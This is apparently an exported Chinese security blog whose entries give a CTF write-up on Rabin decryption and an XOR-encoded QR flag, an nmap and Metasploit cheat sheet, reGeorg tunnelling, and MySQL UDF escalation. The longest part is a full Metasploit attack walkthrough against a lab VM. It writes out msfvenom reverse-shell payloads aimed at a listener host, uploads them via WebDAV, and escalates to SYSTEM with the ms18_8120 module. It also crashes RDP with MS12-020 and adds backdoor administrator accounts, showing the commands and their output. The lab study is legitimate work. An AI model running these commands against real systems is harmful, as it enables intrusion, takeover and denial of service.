ciphertext.txt4f741fe93dd7e383ff527caa9a2f27d27fd74b53b62123837b74a2b024d0fbbe052f3b330ce5208ba989fc68e2f5235ac4e9dd9e091e7cb80c02745d9b2aad10cab9431590ae63117ce539ebf747b4bc81f2a293aea52f0b1fee746158dc45d0c8d60769a8a8e671fb049b52669a010a1ca6f5de851d715bf1821d8771bbeb47 publickey.pem解析出来123key长度：1023模数：5BE098727AE610DE9C104819F3A1F7CC5B3144810B38D4F4D51BBE11D9CA20F287EED0236BCED1FE443A335A2F33C7A8AC68F09FC5F38BFE374A9207D3073D402C7A65A30B60F75B10E43A296730AA22D32527F7203EC9BECC6A7A0DD70A5CE3D1D5F2A8DB9868E8A4534EEF705F2C6A8326C88A536B827C88BC0005227AC9指数：1 (0x1) encrypt.py 1234567891011121314151617181920212223242526from Crypto.Util.number import *import randomdef nextPrime(prim): if isPrime(prim): return prim else: return nextPrime(prim+1)p = getPrime(512)q = nextPrime(p+1)while p%4 != 3 or q%4 !=3: p = getPrime(512) q = nextPrime(p+1)n = p*qm = open('secret.txt').read()m = bytes_to_long(m)m = m**ec = (m*m)%nc = long_to_bytes(c)c = c.encode('hex')cipherfile = open('ciphertext.txt','w')cipherfile.write(c) 题目得知用的是rabin算法,表面e=1,通过脚本可知实际是2 yafu分解模直接上脚本12345678910111213141516171819import libnumimport gmpy2# f = open('flag.enc','r')# c = f.read()# c = libnum.s2n(c)c = 55794223709813934192265135096073563545914401645083132264094031861211381439924290498765378643984142482022780941488967640941896234878298378029331869035026299883890239650523385184000895121634725249518610468891121286187697095281449541110528807147056849808508384046722319812216434329882704675650502328191347845959p = 8268478798627496550868057067863302848395658194493470189583465530982345058367642548587735876643165276333944105562045538477589025350029252013031979923054823q = 8268478798627496550868057067863302848395658194493470189583465530982345058367642548587735876643165276333944105562045538477589025350029252013031979923054799n = p*qr = pow(c,(p+1)/4,p)s = pow(c,(q+1)/4,q)a = gmpy2.invert(p,q)b = gmpy2.invert(q,p)x = (a*p*s+b*q*r)%ny = (a*p*s-b*q*r)%nprint libnum.n2s(x%n)print libnum.n2s((-x)%n)print libnum.n2s(y%n)print libnum.n2s((-y)%n) MISCEXORcism My friend Alex needs your help very fast. He has been possessed by a ghost and the only way to save him is if you tell the flag to the ghost. Hurry up, time is running out! 拿到文件encode.txt是一堆0和1，每行只有一个,去掉换行符后长度为10000,考虑是100*100,结果发现隐约是个二维码 然而直接扫不出来，把原始的1换作255 255 255，把0换作0 0 0写脚本1234567891011121314151617#-*- coding:utf-8 -*-from PIL import Imageimport rex = 100 #x坐标 通过对txt里的行数进行整数分解y = 100 #y坐标 x*y = 行数im = Image.new("RGB",(x,y))#创建图片file = open('encoded.txt') #打开rbg值文件#通过一个个rgb点生成图片for i in range(0,x): for j in range(0,y): line = file.readline()#获取一行 rgb = line.split(" ")#分离rgb im.putpixel((i,j),(int(rgb[0]),int(rgb[1]),int(rgb[2])))#rgb转化为像素im.save("255.png") 从二维码得到 160f15011d1b095339595138535f135613595e1a 与flag异或得到1234567a='160f15011d1b095339595138535f135613595e1a'b='flagflagflagflagflag'FLAG=''for i in range(len(a)/2): FLAG+=chr(int(a[i*2:i*2+2],16)^ord(b[i]))print FLAG#pctf&#123;wh4_50_53r1u5?&#125; Late PR 直接丢进winhex搜索pctf]]></content>
      <categories>
        <category>CTFWP</category>
      </categories>
      <tags>
        <tag>CTF</tag>
      </tags>
  </entry>
  <entry>
    <title><![CDATA[nmap及msf的一些操作]]></title>
    <url>%2F2019%2F02%2F03%2Fnmap%E5%8F%8Amsf%E7%9A%84%E4%B8%80%E4%BA%9B%E6%93%8D%E4%BD%9C%2F</url>
    <content type="text"><![CDATA[nmap常见参数HOST DISCOVERY主机发现 -sL：简单列出扫描的目标 -sn：不做端口扫描，只进行主机发现 -PS/PA/PU/PY[portlist]：使用TCP、SYN/ACK、UDP或SCTP去发现端口 -n：不做DNS解析 -R：总是做DNS反向解析 SCAN TECHNIQUES扫描技术 -sS/sT/sA/sW/sM：使用TCP SYN、全连接Connect()、ACK、Window、Maimon来进行扫描 -sU：UDP扫描 -sO：进行IP协议扫描 PORT SPECIFICATION AND SCAN ORDER端口说明和扫描规则 -p ：只扫描指定的端口 -F：快速模式，扫描比默认端口数量更少的端口 –top-ports ：扫描排名指定的数字前几位的最常用的端口 –port-ratio ：扫描比输入的比例更常用的端口 SERVICE/VERSION DETECTION服务、版本探测 -sV：探测开启的端口来获取服务、版本信息 OS DETECTION系统探测 -O：进行系统探测 OUTPUT输出 -v：增加的详细程度（使用VV更详细） MISC杂项 -6：扫描IPv6的地址 -A：一次扫描包含系统探测、版本探测、脚本扫描和跟踪扫描 -V：输出版本号 msf目录扫描1234567891011121314151617181920212223242526272829303132msf5 &gt; use auxiliary/scanner/http/dir_scanner msf5 auxiliary(scanner/http/dir_scanner) &gt; show options Module options (auxiliary/scanner/http/dir_scanner): Name Current Setting Required Description ---- --------------- -------- ----------- DICTIONARY /usr/share/metasploit-framework/data/wmap/wmap_dirs.txt no Path of word dictionary to use PATH / yes The path to identify files Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target address range or CIDR identifier RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections THREADS 1 yes The number of concurrent threads VHOST no HTTP server virtual hostmsf5 auxiliary(scanner/http/dir_scanner) &gt; set rhosts 192.168.1.44rhosts =&gt; 192.168.1.44msf5 auxiliary(scanner/http/dir_scanner) &gt; set threads 30threads =&gt; 30msf5 auxiliary(scanner/http/dir_scanner) &gt; run[*] Detecting error code[*] Using code '404' as not found for 192.168.1.44[+] Found http://192.168.1.44:80/cgi-bin/ 404 (192.168.1.44)[+] Found http://192.168.1.44:80/doc/ 200 (192.168.1.44)[+] Found http://192.168.1.44:80/icons/ 200 (192.168.1.44)[+] Found http://192.168.1.44:80/index/ 404 (192.168.1.44)[+] Found http://192.168.1.44:80/phpMyAdmin/ 200 (192.168.1.44)[+] Found http://192.168.1.44:80/test/ 404 (192.168.1.44)[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed msf反弹shell（桥接模式下）1234561. msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.75.128 LPORT=62222 -f raw &gt; ~/Desktop/62222.php2. davtest -url http://192.168.1.66:8585/uploads -uploadfile ~/Desktop/62222.php -uploadloc 62222.php3. use exploit/multi/handler 4. set payload php/meterpreter_reverse_tcp 5. show options6. run 1234[*] Started reverse TCP handler on 192.168.1.181:61111 [*] Meterpreter session 1 opened (192.168.1.181:61111 -&gt; 192.168.1.66:53920) at 2019-01-22 13:34:42 +0800meterpreter &gt; getuid查看用户 background(把会话放置后台) sessions -l 利用ms18-8120提权123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123msf5 exploit(multi/handler) &gt; set payload php/meterpreter_reverse_tcppayload =&gt; php/meterpreter_reverse_tcpmsf5 exploit(multi/handler) &gt; show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- -----------Payload options (php/meterpreter_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST 192.168.1.66 yes The listen address (an interface may be specified) LPORT 61111 yes The listen portExploit target: Id Name -- ---- 0 Wildcard Targetmsf5 exploit(multi/handler) &gt; set lhost 192.168.1.181lhost =&gt; 192.168.1.181msf5 exploit(multi/handler) &gt; set lport 31111lport =&gt; 31111msf5 exploit(multi/handler) &gt; run[*] Started reverse TCP handler on 192.168.1.181:31111 [*] Meterpreter session 1 opened (192.168.1.181:31111 -&gt; 192.168.1.66:51745) at 2019-01-22 15:59:07 +0800meterpreter &gt; pwdC:\wamp\www\uploadsmeterpreter &gt; getuidServer username: LOCAL SERVICE (0)meterpreter &gt; background [*] Backgrounding session 1...msf5 exploit(multi/handler) &gt; set payload windows/meterpreter_reverse_tcppayload =&gt; windows/meterpreter_reverse_tcpmsf5 exploit(multi/handler) &gt; show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- -----------Payload options (windows/meterpreter_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) EXTENSIONS no Comma-separate list of extensions to load EXTINIT no Initialization strings for extensions LHOST 192.168.1.181 yes The listen address (an interface may be specified) LPORT 31111 yes The listen portExploit target: Id Name -- ---- 0 Wildcard Targetmsf5 exploit(multi/handler) &gt; set lport 32222lport =&gt; 32222msf5 exploit(multi/handler) &gt; exploit -j -z[*] Exploit running as background job 1.[*] Exploit completed, but no session was created.[*] Started reverse TCP handler on 192.168.1.181:32222 msf5 exploit(multi/handler) &gt; sessions 1[*] Starting interaction with 1...meterpreter &gt; pwdC:\wamp\www\uploadsmeterpreter &gt; execute -f "C:\\wamp\\www\\uploads\\32222.exe"Process 11680 created.meterpreter &gt; [*] Meterpreter session 2 opened (192.168.1.181:32222 -&gt; 192.168.1.66:51969) at 2019-01-22 16:02:19 +0800meterpreter &gt; background [*] Backgrounding session 1...msf5 exploit(multi/handler) &gt; sessions -lActive sessions=============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 1 meterpreter php/windows LOCAL SERVICE (0) @ METASPLOITABLE3 192.168.1.181:31111 -&gt; 192.168.1.66:51745 (192.168.1.66) 2 meterpreter x86/windows NT AUTHORITY\LOCAL SERVICE @ METASPLOITABLE3 192.168.1.181:32222 -&gt; 192.168.1.66:51969 (192.168.1.66)msf5 exploit(multi/handler) &gt; use exploit/windows/local/ms18_8120_win32k_privescmsf5 exploit(windows/local/ms18_8120_win32k_privesc) &gt; show options Module options (exploit/windows/local/ms18_8120_win32k_privesc): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on.Exploit target: Id Name -- ---- 0 Automaticmsf5 exploit(windows/local/ms18_8120_win32k_privesc) &gt; set session 2session =&gt; 2msf5 exploit(windows/local/ms18_8120_win32k_privesc) &gt; exploit [*] Started reverse TCP handler on 192.168.1.181:4444 [+] Exploit finished, wait for privileged payload execution to complete.[*] Sending stage (179779 bytes) to 192.168.1.66[*] Meterpreter session 3 opened (192.168.1.181:4444 -&gt; 192.168.1.66:52455) at 2019-01-22 16:04:23 +0800meterpreter &gt; getuidServer username: NT AUTHORITY\SYSTEM ms12-020远程蓝屏 检测 1234567891011121314151617181920msf5 &gt; use auxiliary/scanner/rdp/ms12_020_checkmsf5 auxiliary(scanner/rdp/ms12_020_check) &gt; show options Module options (auxiliary/scanner/rdp/ms12_020_check): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 3389 yes Remote port running RDP (TCP) THREADS 1 yes The number of concurrent threadsmsf5 auxiliary(scanner/rdp/ms12_020_check) &gt; set threads 20threads =&gt; 20msf5 auxiliary(scanner/rdp/ms12_020_check) &gt; set rhosts 192.168.1.66rhosts =&gt; 192.168.1.66msf5 auxiliary(scanner/rdp/ms12_020_check) &gt; run[+] 192.168.1.66:3389 - 192.168.1.66:3389 - The target is vulnerable.[*] 192.168.1.66:3389 - Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed 执行 12345678910111213141516171819msf5 auxiliary(scanner/rdp/ms12_020_check) &gt; use auxiliary/dos/windows/rdp/ms12_020_maxchannelids msf5 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) &gt; show options Module options (auxiliary/dos/windows/rdp/ms12_020_maxchannelids): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target address range or CIDR identifier RPORT 3389 yes The target port (TCP)msf5 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) &gt; set rhosts 192.168.1.66rhosts =&gt; 192.168.1.66msf5 auxiliary(dos/windows/rdp/ms12_020_maxchannelids) &gt; run[*] 192.168.1.66:3389 - 192.168.1.66:3389 - Sending MS12-020 Microsoft Remote Desktop Use-After-Free DoS[*] 192.168.1.66:3389 - 192.168.1.66:3389 - 210 bytes sent[*] 192.168.1.66:3389 - 192.168.1.66:3389 - Checking RDP status...[+] 192.168.1.66:3389 - 192.168.1.66:3389 seems down[*] Auxiliary module execution completed]]></content>
      <categories>
        <category>工具使用</category>
      </categories>
      <tags>
        <tag>nmap</tag>
        <tag>msf</tag>
      </tags>
  </entry>
  <entry>
    <title><![CDATA[reGeorg+Proxifier内网穿透及提权模拟]]></title>
    <url>%2F2019%2F01%2F27%2FreGeorg-Proxifier%E5%86%85%E7%BD%91%E7%A9%BF%E9%80%8F%E5%8F%8A%E6%8F%90%E6%9D%83%E6%A8%A1%E6%8B%9F%2F</url>
    <content type="text"><![CDATA[内网穿透环境 IP地址 备注 192.168.117.44 主机 192.168.96.243 虚拟机(桥接) 192.168.75.131 虚拟机(NAT) ps:主机连的是wifi，其他人的都在96网段，我的不知道扯了什么在117网段，但主机和桥接之间能正常访问，但桥接的虚拟机(kali)无法访问NAT的虚拟机(windows)，现在目的是实现kali访问windows reGeorg+Proxifier reGeorg是reDuh的继承者，利用了会话层的socks5协议，效率更高结合Proxifier使用 Proxifier是一款功能非常强大的socks5客户端，可以让不支持通过代理服务器工作的网络程序能通过HTTPS或SOCKS代理或代理链 在getshell情况下把对应所需类型文件上传,这里是tunnel.nosocket.php 访问http://192.168.117.44/tunnel.nosocket.php 然后攻击机运行 1python reGeorgSocksProxy.py -p 8555 -u http://192.168.117.44/tunnel.nosocket.php windows下运行Proxifier,然后Profile-&gt;Proxy-Servers Address Port Type 127.0.0.1 8555 SOCKS5 linux下修改proxychains配置 12vim /etc/proxychains.confsocks5 127.0.0.1 8555 运行的时候在程序前面加上proxychains就可以了 proxychains firefox 然后就能访问啦 MySQLudf提权MySQL udf user defined function，用户定义函数,为用户提供了一种高效创建函数的方式 udf设计的初衷是为了给用户提供一个扩展MySQL函数的便利机会，方便用户进行复杂的查询处理，但这也为恶意攻击者通过udf提升权限提供了可能。 udf.dll默认路径,没有就要自己创建plugin 12345小于mysql5.1版本 C:\WINDOWS\udf.dll 或 C:\WINDOWS\system32\udf.dll 等于mysql5.1版本 %mysql%\plugin\udf.dll 用 select @@plugin_dir 查询plugin路径 默认 C:\Program Files\MySQL\lib\plugin\udf.dll getshell后传大马登陆 也可以添加用户提升为管理员1select cmdshell('net user udftest 123456 /add &amp; net localgroup administrators udftest /add')]]></content>
      <categories>
        <category>渗透测试</category>
      </categories>
      <tags>
        <tag>内网</tag>
        <tag>SQL</tag>
      </tags>
  </entry>
  <entry>
    <title><![CDATA[metasploit渗透流程练习]]></title>
    <url>%2F2019%2F01%2F25%2Fmetasploit%E6%B8%97%E9%80%8F%E6%B5%81%E7%A8%8B%E7%BB%83%E4%B9%A0%2F</url>
    <content type="text"><![CDATA[metasploit学习主机发现 测试靶机主要为192.168.114.29,攻击机为192.168.114.176 db_nmap -v -n -sn 192.168.114.0/24 12345678910[*] Nmap: Starting Nmap 7.60 ( https://nmap.org ) at 2019-01-23 11:36 CST[*] Nmap: Initiating ARP Ping Scan at 11:36[*] Nmap: Scanning 255 hosts [1 port/host].........[*] Nmap: Host is up.[*] Nmap: Read data files from: /usr/bin/../share/nmap[*] Nmap: Nmap done: 256 IP addresses (63 hosts up) scanned in 7.80 seconds[*] Nmap: Raw packets sent: 493 (13.804KB) | Rcvd: 105 (2.940KB) 端口扫描 利用msf的db_namp端口扫描 db_nmap -sV -n -v –open -sS -p0-10000 192.168.114.29 发现开放端口(主要测试8585) 12345678910111213141516171819[*] Nmap: PORT STATE SERVICE VERSION[*] Nmap: 22/tcp open ssh OpenSSH 7.1 (protocol 2.0)[*] Nmap: 1617/tcp open rmiregistry Java RMI[*] Nmap: 3000/tcp open http WEBrick httpd 1.3.1 (Ruby 2.3.3 (2016-11-21))[*] Nmap: 4848/tcp open ssl/http Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)[*] Nmap: 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)[*] Nmap: 8020/tcp open http Apache httpd[*] Nmap: 8027/tcp open unknown[*] Nmap: 8080/tcp open http Oracle GlassFish 4.0 (Servlet 3.1; JSP 2.3; Java 1.8)[*] Nmap: 8282/tcp open http Apache Tomcat/Coyote JSP engine 1.1[*] Nmap: 8383/tcp open ssl/http Apache httpd[*] Nmap: 8585/tcp open http Apache httpd 2.2.21 ((Win64) PHP/5.3.10 DAV/2)[*] Nmap: 9200/tcp open http Elasticsearch REST API 1.1.1 (name: Jean Grey-Summers; Lucene 4.7)[*] Nmap: MAC Address: 00:0C:29:E5:F7:74 (VMware)[*] Nmap: Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows[*] Nmap: Read data files from: /usr/bin/../share/nmap[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 2837.85 seconds[*] Nmap: Raw packets sent: 41973 (1.847MB) | Rcvd: 2269 (110.612KB) 目录扫描 基于msf的dir_scanner 1234567891011121314151617181920212223242526272829303132333435363738394041424344msf5 &gt; search dir_scanMatching Modules================ Name Disclosure Date Rank Check Description ---- --------------- ---- ----- ----------- auxiliary/scanner/http/dir_scanner normal Yes HTTP Directory Scannermsf5 &gt; use auxiliary/scanner/http/dir_scanner msf5 auxiliary(scanner/http/dir_scanner) &gt; show options Module options (auxiliary/scanner/http/dir_scanner): Name Current Setting Required Description ---- --------------- -------- ----------- DICTIONARY /usr/share/metasploit-framework/data/wmap/wmap_dirs.txt no Path of word dictionary to use PATH / yes The path to identify files Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target address range or CIDR identifier RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections THREADS 1 yes The number of concurrent threads VHOST no HTTP server virtual hostmsf5 auxiliary(scanner/http/dir_scanner) &gt; set threads 30threads =&gt; 30msf5 auxiliary(scanner/http/dir_scanner) &gt; set rhosts 192.168.114.29rhosts =&gt; 192.168.114.29msf5 auxiliary(scanner/http/dir_scanner) &gt; set rport 8585rport =&gt; 8585msf5 auxiliary(scanner/http/dir_scanner) &gt; run[*] Detecting error code[*] Using code '404' as not found for 192.168.114.29[+] Found http://192.168.114.29:8585/.../ 403 (192.168.114.29)[+] Found http://192.168.114.29:8585/cgi-bin/ 403 (192.168.114.29)[+] Found http://192.168.114.29:8585/icons/ 404 (192.168.114.29)[+] Found http://192.168.114.29:8585/phpmyadmin/ 403 (192.168.114.29)[+] Found http://192.168.114.29:8585/uploads/ 200 (192.168.114.29)[+] Found http://192.168.114.29:8585/wordpress/ 200 (192.168.114.29)[*] Scanned 1 of 1 hosts (100% complete)[*] Auxiliary module execution completed 发现文件上传路径/uploads DAVTest上传测试12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152root@kali:~# davtest -url http://192.168.114.29:8585/uploads******************************************************** Testing DAV connectionOPEN SUCCEED: http://192.168.114.29:8585/uploads********************************************************NOTE Random string for this session: NBIRksdIG8d******************************************************** Creating directoryMKCOL FAIL******************************************************** Sending test filesPUT jhtml SUCCEED: http://192.168.114.29:8585/uploads/davtest_NBIRksdIG8d.jhtmlPUT pl SUCCEED: http://192.168.114.29:8585/uploads/davtest_NBIRksdIG8d.plPUT shtml SUCCEED: http://192.168.114.29:8585/uploads/davtest_NBIRksdIG8d.shtmlPUT txt SUCCEED: http://192.168.114.29:8585/uploads/davtest_NBIRksdIG8d.txtPUT aspx SUCCEED: http://192.168.114.29:8585/uploads/davtest_NBIRksdIG8d.aspxPUT php SUCCEED: http://192.168.114.29:8585/uploads/davtest_NBIRksdIG8d.phpPUT cfm SUCCEED: http://192.168.114.29:8585/uploads/davtest_NBIRksdIG8d.cfmPUT jsp SUCCEED: http://192.168.114.29:8585/uploads/davtest_NBIRksdIG8d.jspPUT cgi SUCCEED: http://192.168.114.29:8585/uploads/davtest_NBIRksdIG8d.cgiPUT html SUCCEED: http://192.168.114.29:8585/uploads/davtest_NBIRksdIG8d.htmlPUT asp SUCCEED: http://192.168.114.29:8585/uploads/davtest_NBIRksdIG8d.asp******************************************************** Checking for test file executionEXEC jhtml FAILEXEC pl FAILEXEC shtml FAILEXEC txt SUCCEED: http://192.168.114.29:8585/uploads/davtest_NBIRksdIG8d.txtEXEC aspx FAILEXEC php SUCCEED: http://192.168.114.29:8585/uploads/davtest_NBIRksdIG8d.phpEXEC cfm FAILEXEC jsp FAILEXEC cgi FAILEXEC html SUCCEED: http://192.168.114.29:8585/uploads/davtest_NBIRksdIG8d.htmlEXEC asp FAIL********************************************************/usr/bin/davtest Summary:PUT File: http://192.168.114.29:8585/uploads/davtest_NBIRksdIG8d.jhtmlPUT File: http://192.168.114.29:8585/uploads/davtest_NBIRksdIG8d.plPUT File: http://192.168.114.29:8585/uploads/davtest_NBIRksdIG8d.shtmlPUT File: http://192.168.114.29:8585/uploads/davtest_NBIRksdIG8d.txtPUT File: http://192.168.114.29:8585/uploads/davtest_NBIRksdIG8d.aspxPUT File: http://192.168.114.29:8585/uploads/davtest_NBIRksdIG8d.phpPUT File: http://192.168.114.29:8585/uploads/davtest_NBIRksdIG8d.cfmPUT File: http://192.168.114.29:8585/uploads/davtest_NBIRksdIG8d.jspPUT File: http://192.168.114.29:8585/uploads/davtest_NBIRksdIG8d.cgiPUT File: http://192.168.114.29:8585/uploads/davtest_NBIRksdIG8d.htmlPUT File: http://192.168.114.29:8585/uploads/davtest_NBIRksdIG8d.aspExecutes: http://192.168.114.29:8585/uploads/davtest_NBIRksdIG8d.txtExecutes: http://192.168.114.29:8585/uploads/davtest_NBIRksdIG8d.phpExecutes: http://192.168.114.29:8585/uploads/davtest_NBIRksdIG8d.html 发现能成功上传txt,php,html 制作php木马12345root@kali:~# msfvenom -p php/meterpreter_reverse_tcp LHOST=192.168.114.176 LPORT=11111 -f raw &gt; ~/Desktop/11111.php[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload[-] No arch selected, selecting arch: php from the payloadNo encoder or badchars specified, outputting raw payloadPayload size: 30659 bytes 上传一句话菜刀连接也行,但这里主要是基于metasploit的学习，最终远控，权限提升 向目标传马1234567root@kali:~# davtest -url http://192.168.114.29:8585/uploads -uploadfile ~/Desktop/11111.php -uploadloc 11111.php******************************************************** Testing DAV connectionOPEN SUCCEED: http://192.168.114.29:8585/uploads******************************************************** unless Uploading fileUpload succeeded: http://192.168.114.29:8585/uploads/11111.php 反弹shell123456789101112131415161718192021222324252627282930313233msf5 &gt; use exploit/multi/handlermsf5 exploit(multi/handler) &gt; set payload php/meterpreter_reverse_tcppayload =&gt; php/meterpreter_reverse_tcpmsf5 exploit(multi/handler) &gt; show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- -----------Payload options (php/meterpreter_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen portExploit target: Id Name -- ---- 0 Wildcard Targetmsf5 exploit(multi/handler) &gt; set lhost 192.168.114.176lhost =&gt; 192.168.114.176msf5 exploit(multi/handler) &gt; set lport 11111lport =&gt; 11111msf5 exploit(multi/handler) &gt; run[*] Started reverse TCP handler on 192.168.114.176:11111 攻击机访问一下http://192.168.114.29:8585/uploads/11111.php 123[*] Meterpreter session 1 opened (192.168.114.176:11111 -&gt; 192.168.114.29:53286) at 2019-01-23 14:44:18 +0800meterpreter &gt; 成功弹shell ms18_8120提权 查看当前用户 12meterpreter &gt; getuidServer username: LOCAL SERVICE (0) 进入shell查systeminfo 1234567891011121314meterpreter &gt; shellProcess 4520 created.Channel 0 created.Microsoft Windows [Version 6.1.7601]Copyright (c) 2009 Microsoft Corporation. All rights reserved.C:\wamp\bin\apache\Apache2.2.21&gt;systeminfoTerminate channel 0? [y/N] y[-] Error running command shell: Rex::TimeoutError Operation timed out.meterpreter &gt; sysinfo[-] Error running command sysinfo: Rex::TimeoutError Operation timed out.meterpreter &gt; [*] 192.168.114.29 - Meterpreter session 2 closed. Reason: Died 桥接模式下，因为多人共用路由网络太差了，会话很容易断，现在改为NAT模式测试 12攻击机:192.168.75.128靶机:192.168.75.134 构造exe反弹shell上传到靶机 1234567891011121314root@kali:~# msfvenom -p windows/meterpreter_reverse_tcp LHOST=192.168.75.128 LPORT=2222 -f exe -o ~/Desktop/2222.exe[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload[-] No arch selected, selecting arch: x86 from the payloadNo encoder or badchars specified, outputting raw payloadPayload size: 179779 bytesFinal size of exe file: 254976 bytesSaved as: /root/Desktop/2222.exeroot@kali:~# davtest -url http://192.168.75.134:8585/uploads -uploadfile ~/Desktop/2222.exe -uploadloc 2222.exe******************************************************** Testing DAV connectionOPEN SUCCEED: http://192.168.75.134:8585/uploads******************************************************** unless Uploading fileUpload succeeded: http://192.168.75.134:8585/uploads/2222.exe 通过shell运行exe,执行漏洞exp,权限从SERVICE提升为SYSTEM 123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104meterpreter &gt; background [*] Backgrounding session 2...msf5 exploit(multi/handler) &gt; sessions -lActive sessions=============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 2 meterpreter php/windows LOCAL SERVICE (0) @ METASPLOITABLE3 192.168.75.128:1111 -&gt; 192.168.75.134:54507 (192.168.75.134)msf5 exploit(multi/handler) &gt; set payload windows/meterpreter_reverse_tcppayload =&gt; windows/meterpreter_reverse_tcpmsf5 exploit(multi/handler) &gt; show options Module options (exploit/multi/handler): Name Current Setting Required Description ---- --------------- -------- -----------Payload options (windows/meterpreter_reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) EXTENSIONS no Comma-separate list of extensions to load EXTINIT no Initialization strings for extensions LHOST 192.168.75.128 yes The listen address (an interface may be specified) LPORT 1111 yes The listen portExploit target: Id Name -- ---- 0 Wildcard Targetmsf5 exploit(multi/handler) &gt; set lport 2222lport =&gt; 2222msf5 exploit(multi/handler) &gt; run -j -z[*] Exploit running as background job 0.[*] Exploit completed, but no session was created.[*] Started reverse TCP handler on 192.168.75.128:2222 msf5 exploit(multi/handler) &gt; sessions -lActive sessions=============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 2 meterpreter php/windows LOCAL SERVICE (0) @ METASPLOITABLE3 192.168.75.128:1111 -&gt; 192.168.75.134:54507 (192.168.75.134)msf5 exploit(multi/handler) &gt; sessions 2[*] Starting interaction with 2...meterpreter &gt; pwdC:\wamp\www\uploadsmeterpreter &gt; execute -f "C:\\wamp\\www\\uploads\\2222.exe"Process 6076 created.meterpreter &gt; [*] Meterpreter session 3 opened (192.168.75.128:2222 -&gt; 192.168.75.134:55448) at 2019-01-23 15:55:27 +0800meterpreter &gt; background [*] Backgrounding session 2...msf5 exploit(multi/handler) &gt; sessions -lActive sessions=============== Id Name Type Information Connection -- ---- ---- ----------- ---------- 2 meterpreter php/windows LOCAL SERVICE (0) @ METASPLOITABLE3 192.168.75.128:1111 -&gt; 192.168.75.134:54507 (192.168.75.134) 3 meterpreter x86/windows NT AUTHORITY\LOCAL SERVICE @ METASPLOITABLE3 192.168.75.128:2222 -&gt; 192.168.75.134:55448 (192.168.75.134)msf5 exploit(multi/handler) &gt; use exploit/windows/local/ms18_8120_win32k_privescmsf5 exploit(windows/local/ms18_8120_win32k_privesc) &gt; show options Module options (exploit/windows/local/ms18_8120_win32k_privesc): Name Current Setting Required Description ---- --------------- -------- ----------- SESSION yes The session to run this module on.Exploit target: Id Name -- ---- 0 Automaticmsf5 exploit(windows/local/ms18_8120_win32k_privesc) &gt; set session 3session =&gt; 3msf5 exploit(windows/local/ms18_8120_win32k_privesc) &gt; run[*] Started reverse TCP handler on 192.168.75.128:4444 [+] Exploit finished, wait for privileged payload execution to complete.[*] Sending stage (179779 bytes) to 192.168.75.134[*] Meterpreter session 4 opened (192.168.75.128:4444 -&gt; 192.168.75.134:55526) at 2019-01-23 15:57:19 +0800meterpreter &gt; getuidServer username: NT AUTHORITY\SYSTEM 远程监控 可通过run vnc实现，也可以添加用户远程登陆1234567891011121314151617181920212223242526272829303132meterpreter &gt; net user[-] Unknown command: net.meterpreter &gt; shellProcess 5892 created.Channel 2 created.Microsoft Windows [Version 6.1.7601]Copyright (c) 2009 Microsoft Corporation. All rights reserved.C:\wamp\bin\apache\Apache2.2.21&gt;net usernet userUser accounts for \\-------------------------------------------------------------------------------Administrator anakin_skywalker artoo_detoo ben_kenobi boba_fett c_three_pio chewbacca darth_vader greedo Guest han_solo jabba_hutt jarjar_binks kylo_ren lando_calrissian leia_organa luke_skywalker sshd sshd_server vagrant The command completed with one or more errors.C:\wamp\bin\apache\Apache2.2.21&gt;net user xiaoming 123456 /addnet user xiaoming 123456 /addThe command completed successfully.C:\wamp\bin\apache\Apache2.2.21&gt;net localgroup administrators xiaoming /addnet localgroup administrators xiaoming /addThe command completed successfully. PS:开启3389端口:REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 用户成功添加xiaoming1234567891011121314C:\wamp\bin\apache\Apache2.2.21&gt;net usernet userUser accounts for \\-------------------------------------------------------------------------------Administrator anakin_skywalker artoo_detoo ben_kenobi boba_fett c_three_pio chewbacca darth_vader greedo Guest han_solo jabba_hutt jarjar_binks kylo_ren lando_calrissian leia_organa luke_skywalker sshd sshd_server vagrant xiaoming The command completed with one or more errors. 简单后渗透尝试 查看是否为虚拟机 1234meterpreter &gt; run post/windows/gather/checkvm[*] Checking if METASPLOITABLE3 is a Virtual Machine .....[+] This is a VMware Virtual Machine 用户是否在线 123456789101112meterpreter &gt; quser[-] Unknown command: quser.meterpreter 